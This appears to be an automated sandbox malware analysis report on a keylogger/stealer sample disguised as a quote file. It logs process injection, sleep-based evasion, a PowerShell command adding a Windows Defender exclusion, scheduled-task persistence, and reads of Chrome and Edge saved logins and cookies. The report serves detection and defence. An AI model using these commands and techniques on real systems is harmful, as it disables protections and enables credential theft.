                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeMemory allocated: 1050000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeMemory allocated: 1BBF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeMemory allocated: EE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeMemory allocated: 1B1D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeMemory allocated: 3270000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeMemory allocated: 1B7F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeMemory allocated: 13C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeMemory allocated: 1B220000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 12_2_00007FFD3450000A sgdt fword ptr [eax]12_2_00007FFD3450000A
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeThread delayed: delay time: 600000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6583Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3205Jump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe TID: 1396Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3500Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe TID: 7264Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe TID: 7264Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe TID: 7216Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe TID: 7476Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe TID: 7476Thread sleep time: -600000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeThread delayed: delay time: 600000
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.3994364046.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3994363463.0000000000ED9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2333448655.000000001C825000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe"
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe"Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeMemory written: C:\Users\user\Desktop\Quote_items1&2.bat.exe base: 140000000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeMemory written: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe base: 140000000 value starts with: 4D5AJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeThread register set: target process: 3884Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeThread register set: target process: 7352Jump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess created: C:\Users\user\Desktop\Quote_items1&2.bat.exe C:\Users\user\Desktop\Quote_items1&2.bat.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpFBBB.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess created: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeQueries volume information: C:\Users\user\Desktop\Quote_items1&2.bat.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeQueries volume information: C:\Users\user\Desktop\Quote_items1&2.bat.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeQueries volume information: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeQueries volume information: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 0000000A.00000002.3995487967.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3998107781.0000000003221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Quote_items1&2.bat.exe PID: 3704, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Quote_items1&2.bat.exe PID: 3884, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wJFLKBSbTtvP.exe PID: 7352, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Quote_items1&2.bat.exe PID: 3704, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Quote_items1&2.bat.exe PID: 3884, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
